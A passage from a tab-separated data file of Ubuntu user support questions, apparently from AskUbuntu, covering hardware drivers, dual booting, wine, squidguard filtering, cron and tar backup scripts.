overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 does anyone know how to get this device working ? update : lsusb output , with/without usb modem attached ( difference only ) connor @ connor : ~ $ lsusb bus 003 device 013 : id 2001:330d d-link corp. dmesg output , last 20 lines
443888	my keyboard randomly wo n't `` let go '' of keys while in dota 2 games	i have ubuntu 13.10 installed on my early 2011 macbook pro , and while playing dota 2 through steam , sometimes my keyboard acts like nothing was pressed . as in my earlier questions ( about my mouse ) , it became known to me that the buttons were n't `` letting go '' . is there any way to fix this in xorg ?
443894	mouse turns off after a few seconds ( ubuntu 13.10 , windows 8.1 )	i tried lsusb and i can see my mouse in the list . i tried for foo in /sys/bus/usb/devices/*/power/level ; > do echo on > $ foo ; > done but i got this reply bash : /sys/bus/usb/devices/1-4/power/level : permission denied bash : /sys/bus/usb/devices/2-2/power/level : permission denied bash : /sys/bus/usb/devices/5-1/power/level : permission denied bash : /sys/bus/usb/devices/5-3/power/level : permission denied bash : /sys/bus/usb/devices/usb1/power/level : permission denied bash : /sys/bus/usb/devices/usb2/power/level : permission denied bash : /sys/bus/usb/devices/usb3/power/level : permission denied bash : /sys/bus/usb/devices/usb4/power/level : permission denied bash : /sys/bus/usb/devices/usb5/power/level : permission denied bash : /sys/bus/usb/devices/usb6/power/level : permission denied note that this only happens whenever my laptop is unplugged .
443895	help for a linux newbie	what are `` lenses ? '' i keep seeing the term in comments by people who have been around linux forever , but it does not appear in any of the legends on the ubuntu desktop . and now you people are driving me up the wall - why are you confusing me with kubuntu , xubuntu , edubuntu , lubuntu ... and `` unity '' ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? how does kde relate to ubuntu ? i am trying to get a handle on ubuntu , and now people are talking about unity - which it appears is for nerds . there is no hope for refugees from windows , looks like i will have to keep plugging along with win 7 .
443900	gimp 2.8 deskew plugin will not install	i tried compiling the deskew plugin using the procedures here , how to compile deskew plugin for gimp ? , to no avail . the plugin does n't show up in the plugin browser , or the layer > transform menu .
443901	wubi wo n't complete install	this has happened with several wubis now . i download ubuntu ( tried kubunto and xubunto also , now with macbuntu that i purchased on ebay ) , click on wubi to install , wubi starts installing then stops saying '' error 404 '' . it leaves a very long note in my c drive temp folder . i am trying to install an ubuntu ( macbuntu ) on my c : drive alongside my windows xp . this is the gist of it . 04-05 14:27 error tasklist : [ errno 14 ] http error 404 : not found traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 377 , in get_metalink file `` \lib\wubi\backends\common\backend.py '' , line 240 , in check_metalink file `` \lib\wubi\backends\common\downloader.py '' , line 78 , in download file `` \lib\urlgrabber\grabber.py '' , line 927 , in urlgrab file `` \lib\urlgrabber\grabber.py '' , line 845 , in _retry file `` \lib\urlgrabber\grabber.py '' , line 913 , in retryfunc file `` \lib\urlgrabber\grabber.py '' , line 1001 , in __init__ file `` \lib\urlgrabber\grabber.py '' , line 1072 , in _do_open file `` \lib\urlgrabber\grabber.py '' , line 1182 , in _make_request urlgraberror : [ errno 14 ] http error 404 : not found 04-05 14:27 debug tasklist : # cancelling tasklist 04-05 14:27 error tasklist : can not download the metalink and therefore the iso traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 492 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 330 , in download_iso exception : can not download the metalink and therefore the iso 04-05 14:27 error root : [ errno 14 ] http error 404 : not found traceback ( most recent call last ) : what is it trying to tell me and how can i get it to install an ubuntu ? can i work around wubi ? the macbuntu runs fine from my d : drive , it 's just that wubi ca n't seem to finish its installation when i want it to .
443908	how to resolve screen flickering in ubuntu 12.04 lts ?	i have been using windows xp professional for a long time . recently i switched to ubuntu 12.04 lts . i have installed ubuntu alongside windows xp pro , but the problem is that whenever i start ubuntu , the graphics are dead and i ca n't see anything . i am quite a naive in the programming stuff . i tried to install it twice but in vain . please help ! specs : intel pentium d 3.00ghz 2gb ram gigabyte g41-m combo
443911	ubuntu precise 12.04 init.d issue after installing percona 5.5	first of all , it keeps on starting mysqld_safe even if it is not provided by my my.cnffile . i found this in the init.d script : '' $ { percona_prefix } '' /bin/mysqld_safe > /dev/null 2 > & 1 & and more , even if both mysqld and mysqld_safe start , init.d returns [ ok ] for stop and [ fail ] for start ( but it starts.. ) .
443916	what causes application window to 'fade ' ?	all , ( using ubuntu 12.04 . issue shows firefox 28 , but has occured with various applications ) in the image below , firefox seemed to have 'faded ' after a script error i have experienced this with other applications , but decided to capture it and post here after seeing it once again . tonight a script on a webpage stop responding , and after 'stopping ' the script , the window lost its colour saturation : ( image on left after script crash , image on right normal colour saturation ) is this a known issue ? -m
443919	how do i copy same files with a particular extension to another directory in terminal	i want to copy all my .png file to particular directory by using : cp ... ../*.png $ pwd but it seemed not working .
443921	pre defined voice software for ubuntu 12.04	i make videos or at times translate videos to local languages . currently , i record using audacity and simply export as mp3 . it is a bit difficult to make my voice sound better in audacity . is there any software which can give a predefined male voice ( or female ) which is of professional sound quality . i translate these videos for free of cost to help local users understand about computers and gadgets . it will be nice if you can give a helping hand . thanks .
443924	using home directory variable in config file	i am editing a config file where i need to specify the full path of a file . however rather than using /home/user/blafile i would like to use something similar to ~/blafile where ~ is understood by bash to be my home directory . however , this does not seem to work in a conf file . is there anyway to do this ?
443925	partitioning hdd for dual ubuntu	i have a lenovo z570 with 4gb ram and 750gb hdd with almost of 300gb of files , and ubuntu 12.04 i386 installed . i moved some stuff around and moved the os to a 50gb partition and the rest for the data . here 's what i 'd like to do , add another 50gb for other version of ubuntu so i can have smoother updates without disturbing my work . so the setup i 'm going for in order of the disk 1 ) 50gb for os1 2 ) 50gb for os2 3 ) whatever 's left for my files 4 ) 4gb /swap a ) is there a way to make 3 ) /home and share it properly with both os without having settings and application data stored there , like thunderbird , gnome and dropbox ? b ) should i consider different swap partitions for every os ? c ) should i consider additional partitions like /boot ? thank you , and i 'm sorry if the question is not properly put , its my first time : )
443929	latest packages available	due to an accessibility bug in the latest versions of ubuntu i will have to revert back to ubuntu 12.04 lts when 12.10 is retired later this month . i see that ubuntu 12.04 came with firefox 11.0 , libreoffice 3.5 , and other outdated ( functionality-wise ) software . though i have no problem compiling firefox , libreoffice , and other apps , i would like to know how could i find out what the currently available software versions are . how could i check this before installing ubuntu 12.04 ? i suppose that at least firefox would have been updated ( due to mozilla update policy ) , but i would like to check first before i install . is there some way to query the canonical repos for the latest software versions available for 12.04 from my current 12.10 system ? would it be easier to check from some web interface on launchpad ? i 'm looking for something similar to aptitude show foobar , but for which i could specify the distro version that the results would be returned for . i could install a virtual machine to check , but i find that cumbersome and not really practical as a day-to-day solution should i ever need to do a similar check in the future .
443930	how to install the driver for this printer ? failing to start the daemon	how do i install the driver ? its failing to start the daemon http : //www.custom.biz/printers/vkp-viii-oii-48-6 # root @ s : ~/downloads/vkp80_cupsdrv_64bit-1.03 # uname -a linux s 3.11.0-18-generic # 32-ubuntu smp tue feb 18 21:11:14 utc 2014 x86_64 x86_64 x86_64 gnu/linux root @ s : ~/downloads/vkp80_cupsdrv_64bit-1.03 # ls rastertovkp80_64bit readme.txt setup vkp80_64bit.ppd.gz root @ s : ~/downloads/vkp80_cupsdrv_64bit-1.03 # ./setup install vkp80 cups driver ./setup : 7 : [ : illegal number : copy cups filter to /usr/lib/cups/filter copy vkp80 ppd files to //usr/share/cups/model/custom * stopping common unix printing system : cupsd [ ok ] * starting common unix printing system : cupsd [ fail ] install complete now you can add a printer queue using the cups tool , go to address http : //localhost:631 with a simpe browser and set up the printer root @ s : ~/downloads/vkp80_cupsdrv_64bit-1.03 # /etc/init.d/cups stop * stopping common unix printing system : cupsd [ ok ] root @ s : ~/downloads/vkp80_cupsdrv_64bit-1.03 # /etc/init.d/cups start * starting common unix printing system : cupsd [ fail ]
443931	how to start developing more cleaner editor 's gui interface ?	i 'm using ubuntu since one year and it got everything i need daily . i 've written couple of applications like gps tracking and live video streaming in c++ with netbeans on ubuntu . the only drawback with linux distributions so far i encountered is untidy gui interface for editors like gedit , netbeans , etc . these type of applications have bigger buttons , bigger boundaries , untidy scroll bars , etc . i think all these applications share common api to generate graphical objects like buttons , scroll bars , etc . i love coding in netbeans on windows rather than on ubuntu because of look and feel . i feel i have more screen estate in windows applications than in ubuntu . i want to try developing or redesigning these gui objects like buttons , scroll bars etc . where to start ? at least through me some light on this.. thank you .
443935	installing ubuntu while keeping recovery partition	this is what i see in the computers directory on my windows 7 partition . this is what i see in the partitioning menu on ubuntu , which i am running off of a 4gb sandisk usb drive . gparted : i want to keep the lenovo_recovery partition so that i can boot into it and reinstall windows 7 if need be . i know i have to format /dev/sda2 since that is obviously windows 7 . but what is /dev/sda1 and /dev/sda4 ? i do n't want to accidentally format the usb drive .
443936	what is equivalent to wakeonlan software in ubuntu ?	wake on lan is very useful gui based software in windows . is there any equivalent for ubuntu available/
443939	ca n't play sims3	i have installed sims 3 and i really want to play it , but when i tried yo play it appears message from playonlinux which saying that wine has crashed . i am getting really upset , and i would like to play my sims ... my ubuntu version is 13.10 and i have tried wine and playonlinux , but none of them worked . also my wine is 1.4 . if there are any commands for installing sims 3 can you tell me or tell me what 's the problem there ? all helpful answers are appreciated ! thank you . this is what the playonlinux message says : error in pol_wine wine seems to have crashed if your program is running , just ignore this message
443941	how to install haskell for ubuntu 13.10 ?	i am trying to do sudo apt-get install haskell-platform but get only package not found message . what do i actually need to do ?
443946	squidguard not filtering on squid3	i 've installed squid3 and all works fine , so i 've installed squidguard for do the content filtering . i 've downloaded the shalla blacklist and i 've modified my squidguard.conf file : root @ squid : /root/bin # cat /etc/squid/squidguard.conf # # config file for squidguard # # caution : do not use comments inside { } # dbhome /var/lib/squidguard/db logdir /var/log/squid # # time rules : # abbrev for weekdays : # s = sun , m = mon , t =tue , w = wed , h = thu , f = fri , a = sat ldapbinddn cn=squid proxy , ou=users , ou=moncalieri , dc=****** , dc=com ldapbindpass ****.123 ldapcachetime 300 ldapprotover 2 # src stdusers { # ldapusersearch ldap : //server02.******.com/cn=proxy-std , ou=groups , ou=moncalieri , dc=********* , dc=com ? memberuid ? sub ? ( & ( objectclass=posixgroup ) ( memberuid= % s ) ) # } # src stdusers { # ldapusersearch ldap : //server02.******.com:3268/dc=************ , dc=com ? samaccountname ? sub ? ( & ( samaccountname= % s ) ( memberof=cn=proxy-std % 2cou=groups % 2cou=moncalieri % 2cdc=**** % 2cdc=com ) ) # ldapusersearch ldap : //server02.*******.com:3268/dc=******** , dc=com ? userprincipalname ? sub ? ( & ( userprincipalname= % s ) ( memberof=cn=proxy-std % 2cou=groups % 2cou=moncalieri % 2cdc=********* % 2cdc=com ) ) # } src stdusers { user maol } src fullusers { ldapusersearch ldap : //server02.******.com:3268/dc=********** , dc=com ? samaccountname ? sub ? ( & ( samaccountname= % s ) ( memberof=cn=proxy-full % 2cou=groups % 2cou=moncalieri % 2cdc=******* % 2cdc=com ) ) ldapusersearch ldap : //server02.*******.com:3268/dc=******** , dc=com ? userprincipalname ? sub ? ( & ( userprincipalname= % s ) ( memberof=cn=proxy-full % 2cou=groups % 2cou=moncalieri % 2cdc=***** % 2cdc=com ) ) } src denyusers { ldapusersearch ldap : //server02.***********.com:3268/dc=******* , dc=com ? samaccountname ? sub ? ( & ( samaccountname= % s ) ( memberof=cn=proxy-deny % 2cou=groups % 2cou=moncalieri % 2cdc=******* % 2cdc=com ) ) ldapusersearch ldap : //server02.********.com:3268/dc=********* , dc=com ? userprincipalname ? sub ? ( & ( userprincipalname= % s ) ( memberof=cn=proxy-deny % 2cou=groups % 2cou=moncalieri % 2cdc=******** % 2cdc=com ) ) } time workhours { weekly mtwhf 08:00 - 16:30 date *-*-01 08:00 - 16:30 } # # destination classes : # dest good { urllist updatesites/urls domainlist updatesites/domains } dest locked { urllist gamble/urls urllist porn/urls urllist remotecontrol/urls urllist socialnet/urls urllist spyware/urls domainlist gamble/domains domainlist porn/domains domainlist remotecontrol/domains domainlist socialnet/domains domainlist spyware/domains } # dest adult { # domainlist bl/adult/domains # urllist bl/adult/urls # expressionlist bl/adult/expressions # redirect http : //admin.foo.bar.de/cgi-bin/blocked.cgi ? clientaddr= % a & clientname= % n & clientuser= % i & clientgroup= % s & targetgroup= % t & url= % u # } # # acl rules : # acl { fullusers { pass all redirect http : //squid . ******.com/block.html } stdusers { pass ! locked all redirect http : //squid . *******.com/block.html } denyusers { pass good none redirect http : //squid . ******.com/block.html } default { pass good none redirect http : //squid . ********.com/block.html } } as you can see for the user maol the socialnet are not allowed , but if i try to access it the request was not redirected . root @ squid : /root/bin # echo `` https : //www.facebook.com 192.168.0.134/ maol - get '' | squidguard -d 10 2014-04-06 10:31:38 [ 5343 ] new setting : dbhome : /var/lib/squidguard/db 2014-04-06 10:31:38 [ 5343 ] new setting : logdir : /var/log/squid 2014-04-06 10:31:38 [ 5343 ] new setting : ldapbinddn : cn=squid proxy , ou=users , ou=moncalieri , dc=********** , dc=com 2014-04-06 10:31:38 [ 5343 ] new setting : ldapbindpass : ******.123 2014-04-06 10:31:38 [ 5343 ] new setting : ldapcachetime : 300 2014-04-06 10:31:38 [ 5343 ] new setting : ldapprotover : 2 2014-04-06 10:31:38 [ 5343 ] added user : maol 2014-04-06 10:31:38 [ 5343 ] init urllist /var/lib/squidguard/db/updatesites/urls 2014-04-06 10:31:38 [ 5343 ] loading dbfile /var/lib/squidguard/db/updatesites/urls.db 2014-04-06 10:31:38 [ 5343 ] init domainlist /var/lib/squidguard/db/updatesites/domains 2014-04-06 10:31:38 [ 5343 ] loading dbfile /var/lib/squidguard/db/updatesites/domains.db 2014-04-06 10:31:38 [ 5343 ] init urllist /var/lib/squidguard/db/gamble/urls 2014-04-06 10:31:38 [ 5343 ] loading dbfile /var/lib/squidguard/db/gamble/urls.db 2014-04-06 10:31:38 [ 5343 ] init urllist /var/lib/squidguard/db/porn/urls 2014-04-06 10:31:38 [ 5343 ] loading dbfile /var/lib/squidguard/db/porn/urls.db 2014-04-06 10:31:38 [ 5343 ] init urllist /var/lib/squidguard/db/remotecontrol/urls 2014-04-06 10:31:38 [ 5343 ] loading dbfile /var/lib/squidguard/db/remotecontrol/urls.db 2014-04-06 10:31:38 [ 5343 ] init urllist /var/lib/squidguard/db/socialnet/urls 2014-04-06 10:31:38 [ 5343 ] loading dbfile /var/lib/squidguard/db/socialnet/urls.db 2014-04-06 10:31:38 [ 5343 ] init urllist /var/lib/squidguard/db/spyware/urls 2014-04-06 10:31:38 [ 5343 ] loading dbfile /var/lib/squidguard/db/spyware/urls.db 2014-04-06 10:31:38 [ 5343 ] init domainlist /var/lib/squidguard/db/gamble/domains 2014-04-06 10:31:38 [ 5343 ] loading dbfile /var/lib/squidguard/db/gamble/domains.db 2014-04-06 10:31:38 [ 5343 ] init domainlist /var/lib/squidguard/db/porn/domains 2014-04-06 10:31:38 [ 5343 ] loading dbfile /var/lib/squidguard/db/porn/domains.db 2014-04-06 10:31:38 [ 5343 ] init domainlist /var/lib/squidguard/db/remotecontrol/domains 2014-04-06 10:31:38 [ 5343 ] loading dbfile /var/lib/squidguard/db/remotecontrol/domains.db 2014-04-06 10:31:38 [ 5343 ] init domainlist /var/lib/squidguard/db/socialnet/domains 2014-04-06 10:31:38 [ 5343 ] loading dbfile /var/lib/squidguard/db/socialnet/domains.db 2014-04-06 10:31:38 [ 5343 ] init domainlist /var/lib/squidguard/db/spyware/domains 2014-04-06 10:31:38 [ 5343 ] loading dbfile /var/lib/squidguard/db/spyware/domains.db 2014-04-06 10:31:38 [ 5343 ] squidguard 1.4 started ( 1396773098.335 ) 2014-04-06 10:31:38 [ 5343 ] info : recalculating alarm in 21502 seconds 2014-04-06 10:31:38 [ 5343 ] squidguard ready for requests ( 1396773098.338 ) 2014-04-06 10:31:38 [ 5343 ] squidguard stopped ( 1396773098.338 )
443948	ca n't stream both audio sources , only mic works .	why does the following code not stream both audio sources ? # ! /bin/bash inres= '' 1920x1080 '' outres= '' 1280x720 '' fps= '' 20 '' qual= '' medium '' stream_key= $ ( cat ~/.twitch_key ) avconv -g 0 \ -f x11grab -s $ inres -r `` $ fps '' -i :0.0+0,768 \ -f pulse -i `` alsa_input.pci-0000_00_1b.0.analog-stereo '' \ -f pulse -i `` alsa_output.pci-0000_00_1b.0.analog-stereo.monitor '' \ -vcodec libx264 -s $ outres -preset $ qual \ -acodec libmp3lame -ar 44100 -threads 4 -qscale 1 -b 712k -bufsize 1024k \ -f flv `` rtmp : //live.justin.tv/app/ $ stream_key ''
443953	does ubuntu use segments or pages to allocate main memory ?	segmentation or paging scheme that ubuntu 12.04 use to allocate the main memory ? does it use both of it ? how ? if it does n't use both scheme , so what the scheme that should be use ? why ?
443959	bash script to tar a folder saves basepath	my script tars a folder in my /home/user directory and saves it all in a backup folder . however , when i open each of the tar.gz all of them have the directory /home/user and then the folders and files i wanted to compress . my script : # ! /bin/bash if [ ! -d ~/backup ] ; then mkdir ~/backup fi for i in `ls ~/folder` ; do echo `` ~/folder/ $ i '' if [ -d ~/folder/ $ i ] ; then tar -zcf ~/backup/ $ i.tar.gz ~/folder/ $ i fi done what can i do to prevent /home/user to be saved ?
443960	auto-connect to wifi using interfaces file	i want to get ubuntu server 14.04 to auto-connect to my wifi . i got this in /etc/network/interfaces : auto wlan0 iface wlan0 inet static address 192.168.1.5 broadcast 192.168.1.255 dns-nameservers 192.168.1.1 gateway 192.168.1.1 netmask 255.255.255.0 wpa-ssid myssid wpa-psk mypsk but it does n't connect at boot . ifconfig output seems to be [ ok ] , but iwconfig output shows that it 's not connected to my ssid . running ifdown wlan0 and ifup wlan0 makes it connect [ ok ] , but i do n't want to keep doing that .
443963	how to install wireless dongle ?	good morning to all ubuntu users . about 24 hours ago , i changed the operating system from windows to linux . while i used to be able to play around with anything in windows , now i feel like i am having difficulties . should i install the drivers for my wireless dongle ? i lost the installation cd and when i try the web to find the drivers , the system tells me that it is impossible to open the files . could anyone explain to me step by step what to do ? thank you in advance !
443966	unexpected and random computer shutdowns	system info/specs : ram memory 2.0 gib processor amd athlon ( tm ) 64 x2 dual core processor 4600+ ă 2 graphics standard gallium 0.4 on nv86 ubuntu 13.10 64-bit internal hdd 250gb external hdd 160gb internet connection download 30mbps , upload 6mbps so far i am `` living '' with this situation , as it is really not a `` show stopper '' for me , as i am still able to perform my important computer\file\storage\internet operations [ ok ] - but am wondering , if there may be any suggestions as to solutions . shut down problems : computer occasionally shuts down ( powers down , i.e . not rebooting ) . seems not to be due to temperature , as all hardware temp sensors are within normal ranges . does not occur when computer is `` idle '' ( not performing any active function ) . seems to occur only when installing/running certain software packages/utilities . powering up/rebooting , puts operation back to normal , although it may sometimes take more than one power up/reboot operation , with `` shut downs '' each try , then finally completes [ ok ] . some programs that sometimes regularly cause this are : hdd ranger defrag utility build 2.0 ( usually completes [ ok ] 1st time , but may sometimes take 2-3 tries , with `` shut downs '' each try , then finally completes [ ok ] ) . clam virus scanner ( av , tk ) , never actually completes and always causes a `` shut down '' ( during a scan , if i notice any `` threats found '' , i can click `` cancel '' , display what it has found so far , and `` view/delete/quarantine '' the files , and continue on , but if i attempt to wait for completion , it never completes and it always `` shuts down '' at some point before completion . best regards , wlh , colorado
443973	touchscreen only changes position of pointer	i 've bought new dell inspiron 15z ultrabook touch and succesfully installed ubuntu . but the touchsceen works only partly . when i tap some point pointer moves there ( hover ) but not clicks . so i have to click a touchpad 's button to click ( what is not really comfortable ) . how to fox it ? thanks for answer ! me @ mycomp : ~ $ xinput list-props 17 device 'atmel atmel maxtouch digitizer ' : device enabled ( 134 ) : 1 coordinate transformation matrix ( 136 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 265 ) : 0 device accel constant deceleration ( 266 ) : 1.000000 device accel adaptive deceleration ( 267 ) : 1.000000 device accel velocity scaling ( 268 ) : 10.000000 device product id ( 254 ) : 1003 , 34819 device node ( 255 ) : `` /dev/input/event10 '' evdev axis inversion ( 269 ) : 0 , 0 evdev axis calibration ( 270 ) : < no items > evdev axes swap ( 271 ) : 0 axis labels ( 272 ) : `` abs mt position x '' ( 288 ) , `` abs mt position y '' ( 289 ) , `` none '' ( 0 ) , `` none '' ( 0 ) button labels ( 273 ) : `` button unknown '' ( 257 ) , `` button unknown '' ( 257 ) , `` button unknown '' ( 257 ) , `` button wheel up '' ( 140 ) , `` button wheel down '' ( 141 ) evdev middle button emulation ( 274 ) : 0 evdev middle button timeout ( 275 ) : 50 evdev third button emulation ( 276 ) : 0 evdev third button emulation timeout ( 277 ) : 1000 evdev third button emulation button ( 278 ) : 3 evdev third button emulation threshold ( 279 ) : 20 evdev wheel emulation ( 280 ) : 0 evdev wheel emulation axes ( 281 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 282 ) : 10 evdev wheel emulation timeout ( 283 ) : 200 evdev wheel emulation button ( 284 ) : 4 evdev drag lock buttons ( 285 ) : 0
443974	dual boot windows 7 + ubuntu 13.10	i want to dual boot windows 7 and ubuntu 13.10 , but when i choose installation type it says : there is no recognized operating systems on my computer . so basically my options are either erase disc and install ubuntu or something else . i need to select something else . before that , do i need to resize some partitions in gparted ? i was n't able to get a image so they were as follows : /dev/sda3 43.72gib unallocated 67.84gib partition `/dev/sda1 filesystem fat32 mount point - size 100.00mib used 21.76mib unused : 78.24 mib flags boot /dev/sda2 ! filesystem unknown mount point - size 128.00mib used - unused - flags msftres /dev/sda3 filesystem ntfs mount point /media/ubuntu/d0489cbe489ca4ae size 43.72gib used 28.63gib unused 15.o9 gib flags msftdata unallocated filesystem unallocated mount point - size 67.84gib used - unused - flags now i would like to know how should i resize these partitions in gparted ? after that when choosing something else in installation type what partitions should i create ( maybe swap , ext4 journalizing file system ? ) and moreover : 'how can i get a working bootloader with windows and ubuntu ' . i don`t want to use my repair cd-disc boot repair thanks
443976	install garrysmod on flash drive running ubuntu	i have set up a 16gb flash drive with ubuntu on it , i have installed steam but when i go to install gmod it says that i only have 1705mb of memory . is this storage space coming from the usb stick or the hard drive and how would i increase it ? also i have tried creating a new steam libary but it says the drive is read-only
443983	booting ubuntu on a different computer	i installed ubuntu 12.04 , and installed linus ' last kernel ( 3.14 ) and it boot fine on my computer . i took the hard disk and put it on another computer and it did n't succeed to boot from my hd and moved to the next boot item ( from lan ) . secure boot is disabled on the bios . i also tried disabling uefi . what could be the problem and how can i solve it ? thank you ! shahal
443984	ca n't uninstall a program	after installing ubuntu for the first time on an old laptop , i navigated to firefox and went to facebook . upon entering the website , i was prompted to install a piece of software called 'facebookmessenger ' , which i now can not remove . there is no uninstall button present .
443990	crontab backup not working ( not generating log )	i want to run a script every day at a certain hour , so i saw that i could use cron for that . following the tutorial , i edited the crontab file like this : crontab -e and added : 26 13 * * * ./home/user/backup.sh & & echo `` backup done : $ ( date + '' % y % m % d % h % m % s '' ) '' > > /home/user/log.txt 13:26 was 2 minutes ago , however in /home/user there is no log.txt what is wrong ?
443995	qml pagestack , communication between pages - return values	i defined pagestack only on master page ( a.qml ) : import qtquick 2.0 import ubuntu.components 0.1 mainview { width : units.gu ( 48 ) height : units.gu ( 60 ) pagestack { id : pagestack page { id : page0 title : i18n.tr ( `` root page '' ) button { objectname : `` button1 '' color : `` white '' text : i18n.tr ( `` dictionary '' ) onclicked : { print ( `` childa '' ) pagestack.push ( qt.resolvedurl ( `` childa.qml '' ) ) } } } } } child page ( childa.qml ) look like this : import qtquick 2.0 import ubuntu.components 0.1 page { id : page0 title : i18n.tr ( `` childa page '' ) button { objectname : `` button2 '' color : `` white '' text : i18n.tr ( `` start child subchild1.qml '' ) onclicked : { print ( `` childa '' ) pagestack.push ( qt.resolvedurl ( `` subchild1.qml '' ) ) } } button { objectname : `` button3 '' color : `` white '' text : i18n.tr ( `` start child subchild2.qml '' ) onclicked : { print ( `` childa '' ) pagestack.push ( qt.resolvedurl ( `` subchild2.qml '' ) ) } } } when closing subchild2.qml or subchild2.qml i need on childa.qml information if closed subchild2.qml or closed subchild2 , and i need some return parameters from them . how to do this ?
443996	virtualbox - failed to open a session for the virtual machine . no error info	i 'm trying to start an ubuntu 13.10 virtual machine from a saved state . this works correctly if i restart the virtual machine a few moments after stopping , but not if i start it a few minutes later . i then get this error : failed to open a session for the virtual machine thesis . no error info . result code : ns_error_call_failed ( 0x800706be ) component : progressproxy interface : iprogress { c20238e4-3221-4d3f-8891-81ce92d9f913 } you can find the logfile here . virtualbox vm 4.3.10 r93012 host : ubuntu 13.10 64 bit desktop guest : ubuntu 13.10 64 bit desktop guest additions are installed and i have one auto-mounting shared folder . so far i have tried upgrading virtualbox ( from the one in ubuntu software center to 4.3.10 from the virtualbox website ) and re-building the virtual machine from scratch . what is the next step in debugging this ? i get `` no error info . '' in the error dialog and i ca n't find any errors in the log .
444003	wine works , but the launcher and the global menu bar are on the screen when running apps , why ?	i used wine to run counter strike 1.6 on ubuntu 12.04 and everything works well , excepting that the launcher and the global menu bar remain on the screen.they just become twice bigger and when i 'm playing the game it 's really annoying.does anybody know what can i do ( until now i did n't try other apps or games , i wan na repair this issue first ) ? ? ?
444004	how to install ubuntu on a computer without opening windows xp , i inherited it without password . if not possible , what other solution	i want to format the disk and install ubuntu . i can not enter in xp . got it from my dad who is dead , so no xp disk and no pass word . thanks
444005	what is causing ubuntu on macbook pro to have high cpu usage ?	i installed ubuntu 13.10 on a macbook pro 10,1 . however , after installing , the kworker process consumes over 90 % of cpu usage . i tried the following : ( suggested in this answer ) execute grep . -r /sys/firmware/acpi/interrupts/ to see if any gpes have high values . ( suggested in this answer ) under sudo -s , execute echo l > /proc/sysrq-trigger and read the output in dmesg . ( suggested in this answer ) execute sudo perf record -g -a sleep 10 and read the output in perf report . for 1 , gpe16 had a high value and it kept climbing . i tried disabling gpe16 as suggested in the answer , and the kworker cpu usage went down to 0.0 % . for 2 ( without disabling gpe16 ) , dmesg showed no additional information than what was present at boot . for 3 ( without disabling gpe16 ) , it reported the following in red : - 50.76 % kworker/0:5 [ kernel.kallsyms ] [ k ] native_read_tsc - native_read_tsc - 64.72 % delay_tsc __const_udelay + gmux_index_wait_ready.isra.6 - 35.28 % __const_udelay + gmux_index_wait_ready.isra.6 - 35.14 % kworker/0:5 [ kernel.kallsyms ] [ k ] delay_tsc - delay_tsc - __const_udelay - gmux_index_wait_ready.isra.6 - 59.84 % gmux_index_write8 gmux_notify_handler acpi_ev_notify_dispatch acpi_os_execute_deferred process_one_work worker_thread kthread ret_from_fork - 40.16 % gmux_index_read8 gmux_notify_handler acpi_ev_notify_dispatch acpi_os_execute_deferred process_one_work worker_thread kthread ret_from_fork questions : ( a ) what is gpe16 ? how do i know that disabling this interrupt for the sake of kworker will not have other consequences ? ( b ) what information can be gleaned from perf report ? is there something do to with the timestamp on the macbook pro ?
444010	how to prevent java applications from creating tray icon ?	with ubuntu 13.04 the possibility to whitelist ( and consequentely blacklist ) certain applications from creating a tray icon is gone . since then the tray icons of java applications and wine icons are hardcoded and always visible . although there are certain ppas , that provide a unity patch by giving back the systray.whitelist ( not for 14.04 though , yet ) i 'd like to know if there are other ways to hide the tray-icons of java apps ( e.g . jdownloader ) i know that there 's a way in doing so for qt-applications by implementing apparmor-profiles that deny read access to the sni-qt package ( e.g . for skype , or spotify ) is there a way to implement apparmor profiles or something similar for java applications and/or wine applications ? thanks
444012	wacom cth680 not recognised - ubuntu 13.10	i have followed all of the guides i can possibly find on compiling/installing the driver for my new cth680 tablet . lsusb shows that the usb driver sees the tablet : bus 002 device 005 : id 056a:0303 wacom co. , ltd ubuntu 13.10 steadfastly refuses to agree that it exists . i 've followed this guide step by step and i had issues installing the linux-header files to enable me , to build the driver . my kernel reports as being : 3.11.0-19-generic whereas the version of the header files that installed for me ( without some sort of error when trying to install ) was : 3.8.0-33-generic the wacom.ko file that was produced by this version is now residing in the correct location for my system . however the wacom tablet application in system settings still wo n't recognisze the devices existence . can anyone lend any insight into what the problem may be ? -- thanks .
444013	how to tar the n most recent files with spaces in filename ?	i am trying to create a script that foreach directoy in the folder folder , only the n most recent files are to be compressed . however , i am having trouble with the multiple word files . i need a way to wrap them in quote marks so the tar command knows wich is each file . here is my script so far : # ! /bin/bash if [ ! -d ~/backup ] ; then mkdir ~/backup fi cd ~/folder for i in * ; do if [ -d `` $ i '' ] ; then original=`pwd` cd $ i echo tar zcf ~/backup/ '' $ i '' .tar.gz `` `ls -t | head -10` '' cd $ original fi done echo `` backup copied in $ home/backup/ '' exit 0
444015	accidentally formatted windows 8	when i am installing ubuntu 13.10 i accidentally formatted windows 8 . now i am not able to access windows . i had four partitions in windows now i have only one partitions . will it be possible to recover windows os and recover my data back ?
